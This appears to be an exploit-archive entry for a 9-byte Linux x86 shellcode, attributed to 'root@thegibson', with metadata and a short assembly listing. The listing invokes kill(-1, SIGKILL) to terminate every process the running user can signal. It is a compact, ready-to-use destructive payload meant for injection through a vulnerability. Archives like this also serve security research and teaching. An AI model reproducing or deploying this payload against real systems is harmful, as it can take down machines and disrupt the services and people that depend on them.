[] NeoSense

Linux/x86 - Kill All Processes Shellcode (9 bytes)

Author: root@thegibson
type: 
platform: linux_x86
port: 9.0
date_added: 2010-01-13 
date_updated: 2018-01-17 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

; linux/x86 kill all processes 9 bytes
; root@thegibson
; 2010-01-14

section .text
        global _start

_start:
        ; kill(-1, SIGKILL);
        mov al, 37
        push byte -1
        pop ebx
        mov cl, 9
        int 0x80